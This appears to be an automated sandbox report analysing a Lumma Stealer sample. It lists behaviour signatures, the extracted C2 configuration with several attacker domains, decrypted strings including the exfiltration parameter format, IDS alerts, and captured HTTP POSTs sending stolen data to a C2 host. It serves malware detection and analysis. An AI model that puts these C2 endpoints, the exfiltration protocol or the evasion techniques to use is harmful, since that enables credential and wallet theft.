Windows Analysis Report
SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe

Overview

General Information

Sample name: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe
Analysis ID: 1436372
MD5: 5573f9d646c2ff5c4cd5ee82a5b01e92
SHA1: 6c828b45f929b6747a42470abbdcf307a56953f0
SHA256: 7c4580a23caaebf1a6bf1789f1ef4fad53b72fa736a7b11eb3cb70a089d34486
Tags: exe

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
Snort IDS alert for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: WScript or CScript Dropper
Tries to harvest and steal browser information (history, passwords, etc.)
Tries to steal Crypto Currency Wallets
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript called in batch mode (suppress errors)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number, etc.) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file name is different from the original file name gathered from version info
Searches for user specific document files
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

AV Detection

Source: 30.2.Buffer.pif.230000.0.unpack Malware Configuration Extractor: LummaC {"C2 url": ["boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "zippyfinickysofwps.shop"], "Build id": "fuOLMb--"}
Source: https://zippyfinickysofwps.shop/api Virustotal: Detection: 9%
Source: sweetsquarediaslw.shop Virustotal: Detection: 10%
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe ReversingLabs: Detection: 15%
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Virustotal: Detection: 12%
Source: 0000001E.00000002.2835522264.0000000000230000.00000004.00000400.00020000.00000000.sdmp String decryptor: boredimperissvieos.shop
Source: 0000001E.00000002.2835522264.0000000000230000.00000004.00000400.00020000.00000000.sdmp String decryptor: holicisticscrarws.shop
Source: 0000001E.00000002.2835522264.0000000000230000.00000004.00000400.00020000.00000000.sdmp String decryptor: sweetsquarediaslw.shop
Source: 0000001E.00000002.2835522264.0000000000230000.00000004.00000400.00020000.00000000.sdmp String decryptor: plaintediousidowsko.shop
Source: 0000001E.00000002.2835522264.0000000000230000.00000004.00000400.00020000.00000000.sdmp String decryptor: miniaturefinerninewjs.shop
Source: 0000001E.00000002.2835522264.0000000000230000.00000004.00000400.00020000.00000000.sdmp String decryptor: zippyfinickysofwps.shop
Source: 0000001E.00000002.2835522264.0000000000230000.00000004.00000400.00020000.00000000.sdmp String decryptor: obsceneclassyjuwks.shop
Source: 0000001E.00000002.2835522264.0000000000230000.00000004.00000400.00020000.00000000.sdmp String decryptor: acceptabledcooeprs.shop
Source: 0000001E.00000002.2835522264.0000000000230000.00000004.00000400.00020000.00000000.sdmp String decryptor: zippyfinickysofwps.shop
Source: 0000001E.00000002.2835522264.0000000000230000.00000004.00000400.00020000.00000000.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000001E.00000002.2835522264.0000000000230000.00000004.00000400.00020000.00000000.sdmp String decryptor: TeslaBrowser/5.5
Source: 0000001E.00000002.2835522264.0000000000230000.00000004.00000400.00020000.00000000.sdmp String decryptor: - Screen Resoluton:
Source: 0000001E.00000002.2835522264.0000000000230000.00000004.00000400.00020000.00000000.sdmp String decryptor: - Physical Installed Memory:
Source: 0000001E.00000002.2835522264.0000000000230000.00000004.00000400.00020000.00000000.sdmp String decryptor: Workgroup: -
Source: 0000001E.00000002.2835522264.0000000000230000.00000004.00000400.00020000.00000000.sdmp String decryptor: fuOLMb--
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_016168A5 CryptUnprotectData, 26_2_016168A5
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.21.39.216:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.39.216:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.39.216:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.39.216:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.39.216:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.39.216:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.39.216:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.39.216:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Code function: 0_2_00406739 FindFirstFileW,FindClose, 0_2_00406739
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Code function: 0_2_00402902 FindFirstFileW, 0_2_00402902
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Code function: 0_2_00405AED GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405AED
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004DE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 18_2_004DE472
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004EA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 18_2_004EA087
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004EA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 18_2_004EA1E2
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004EA570 FindFirstFileW,Sleep,FindNextFileW,FindClose, 18_2_004EA570
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004AC622 FindFirstFileExW, 18_2_004AC622
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004E66DC FindFirstFileW,FindNextFileW,FindClose, 18_2_004E66DC
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004E7333 FindFirstFileW,FindClose, 18_2_004E7333
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004E73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 18_2_004E73D4
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004DD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 18_2_004DD921
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004DDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 18_2_004DDC54
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0046A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 26_2_0046A087
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0046A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 26_2_0046A1E2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0045E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 26_2_0045E472
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0046A570 FindFirstFileW,Sleep,FindNextFileW,FindClose, 26_2_0046A570
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0042C622 FindFirstFileExW, 26_2_0042C622
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_004666DC FindFirstFileW,FindNextFileW,FindClose, 26_2_004666DC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00467333 FindFirstFileW,FindClose, 26_2_00467333
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_004673D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 26_2_004673D4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0045D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 26_2_0045D921
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0045DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 26_2_0045DC54
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then cmp word ptr [eax+ecx+02h], 0000h 26_2_01624450
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov ecx, dword ptr [esp+08h] 26_2_0163E6B0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov esi, dword ptr [esp+70h] 26_2_01616975
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov ecx, dword ptr [esp+08h] 26_2_01602A60
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov ecx, dword ptr [esp+04h] 26_2_0163EC50
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov byte ptr [eax], cl 26_2_01626F56
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov byte ptr [ecx], al 26_2_01627878
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov byte ptr [eax], cl 26_2_01627878
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov edi, dword ptr [esi+0Ch] 26_2_01621ADB
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov byte ptr [edi], cl 26_2_0162617B
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h 26_2_0161817E
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then jmp eax 26_2_016222B0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov eax, dword ptr [esp+10h] 26_2_016165CB
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then movzx edx, byte ptr [esi+edi] 26_2_016025D0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov ecx, dword ptr [esp+08h] 26_2_0163E590
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then lea eax, dword ptr [edi+04h] 26_2_0162475B
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then movzx edx, byte ptr [ebx+eax-01h] 26_2_0163C622
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov eax, dword ptr [esi+5Ch] 26_2_016246F8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then cmp word ptr [edi+ecx+02h], 0000h 26_2_0161A8F0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov ecx, dword ptr [esi+10h] 26_2_016288F9
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov byte ptr [ecx], dl 26_2_016288F9
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov ecx, dword ptr [esp+08h] 26_2_0163E8D0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov eax, dword ptr [esp+00000170h] 26_2_01612B63
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then inc ebx 26_2_01614D20
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov byte ptr [eax], cl 26_2_01626F60
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov ecx, dword ptr [esp+04h] 26_2_0163EF60
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then movsx ecx, byte ptr [esi+eax] 26_2_0160CF10
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then jmp ecx 26_2_0163AF87
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov eax, dword ptr [esi+10h] 26_2_01624E60
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then movzx ebx, byte ptr [edx] 26_2_01634E40
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov byte ptr [ecx], al 26_2_01616E26
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov ecx, dword ptr [esp+0Ch] 26_2_0163CE90
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov edx, dword ptr [esp+0Ch] 26_2_0163B383
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov ebx, eax 26_2_01623269
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov eax, dword ptr [01645A9Ch] 26_2_01617213
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then movzx edi, byte ptr [ecx+esi] 26_2_016032C0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov ecx, dword ptr [esp+0Ch] 26_2_0163F2C0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then dec edi 26_2_0163F2C0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then add ebx, 02h 26_2_016112AC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then inc esi 26_2_016112AC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov ecx, dword ptr [esp+70h] 26_2_01617533
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov ebx, dword ptr [edi+04h] 26_2_016257B0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then jmp ecx 26_2_016376B1
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov word ptr [eax], cx 26_2_0161784E
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then jmp ecx 26_2_016379D4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov eax, dword ptr [esi+20h] 26_2_0161F870
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov word ptr [eax], cx 26_2_01617853
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then jmp ecx 26_2_016378C4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then movzx edx, word ptr [ebp+eax*4+00h] 26_2_01607D50
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov edi, dword ptr [esp] 26_2_01607D50
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then push edi 26_2_01613DC9
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov byte ptr [ecx], al 26_2_01627C5C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov byte ptr [eax], cl 26_2_01627C5C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov ebx, ecx 26_2_0163DC3C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then xor ebx, ebx 26_2_01613F77
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then cmp byte ptr [edx], 00000000h 26_2_01611E79
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov ecx, dword ptr [esp+00000080h] 26_2_0161DEF9
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 4x nop then mov word ptr [eax], cx 26_2_0161DEF9

Networking

Source: Traffic Snort IDS: 2052374 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (zippyfinickysofwps .shop) 192.168.2.4:58844 -> 1.1.1.1:53
Source: Traffic Snort IDS: 2052384 ET TROJAN Observed Lumma Stealer Related Domain (zippyfinickysofwps .shop in TLS SNI) 192.168.2.4:49739 -> 104.21.39.216:443
Source: Traffic Snort IDS: 2052384 ET TROJAN Observed Lumma Stealer Related Domain (zippyfinickysofwps .shop in TLS SNI) 192.168.2.4:49740 -> 104.21.39.216:443
Source: Traffic Snort IDS: 2052384 ET TROJAN Observed Lumma Stealer Related Domain (zippyfinickysofwps .shop in TLS SNI) 192.168.2.4:49741 -> 104.21.39.216:443
Source: Traffic Snort IDS: 2052384 ET TROJAN Observed Lumma Stealer Related Domain (zippyfinickysofwps .shop in TLS SNI) 192.168.2.4:49742 -> 104.21.39.216:443
Source: Traffic Snort IDS: 2052384 ET TROJAN Observed Lumma Stealer Related Domain (zippyfinickysofwps .shop in TLS SNI) 192.168.2.4:49743 -> 104.21.39.216:443
Source: Traffic Snort IDS: 2052384 ET TROJAN Observed Lumma Stealer Related Domain (zippyfinickysofwps .shop in TLS SNI) 192.168.2.4:49744 -> 104.21.39.216:443
Source: Traffic Snort IDS: 2052384 ET TROJAN Observed Lumma Stealer Related Domain (zippyfinickysofwps .shop in TLS SNI) 192.168.2.4:49746 -> 104.21.39.216:443
Source: Traffic Snort IDS: 2052384 ET TROJAN Observed Lumma Stealer Related Domain (zippyfinickysofwps .shop in TLS SNI) 192.168.2.4:49747 -> 104.21.39.216:443
Source: Malware configuration extractor URLs: boredimperissvieos.shop
Source: Malware configuration extractor URLs: holicisticscrarws.shop
Source: Malware configuration extractor URLs: sweetsquarediaslw.shop
Source: Malware configuration extractor URLs: plaintediousidowsko.shop
Source: Malware configuration extractor URLs: miniaturefinerninewjs.shop
Source: Malware configuration extractor URLs: zippyfinickysofwps.shop
Source: Malware configuration extractor URLs: obsceneclassyjuwks.shop
Source: Malware configuration extractor URLs: acceptabledcooeprs.shop
Source: Malware configuration extractor URLs: zippyfinickysofwps.shop
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global traffic HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: zippyfinickysofwps.shop
Source: global traffic HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 49
    Host: zippyfinickysofwps.shop
Source: global traffic HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 18158
    Host: zippyfinickysofwps.shop
Source: global traffic HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8779
    Host: zippyfinickysofwps.shop
Source: global traffic HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20432
    Host: zippyfinickysofwps.shop
Source: global traffic HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 7079
    Host: zippyfinickysofwps.shop
Source: global traffic HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1249
    Host: zippyfinickysofwps.shop
Source: global traffic HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 595320
    Host: zippyfinickysofwps.shop
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004ED889 InternetReadFile,SetEvent,GetLastError,SetEvent, 18_2_004ED889
Source: global traffic DNS traffic detected: DNS query: hhnlUmHdzjZFqZYoOtpryMy.hhnlUmHdzjZFqZYoOtpryMy
Source: global traffic DNS traffic detected: DNS query: zippyfinickysofwps.shop
Source: unknown HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: zippyfinickysofwps.shop
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Buffer.pif, 0000001A.00000003.2071800006.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
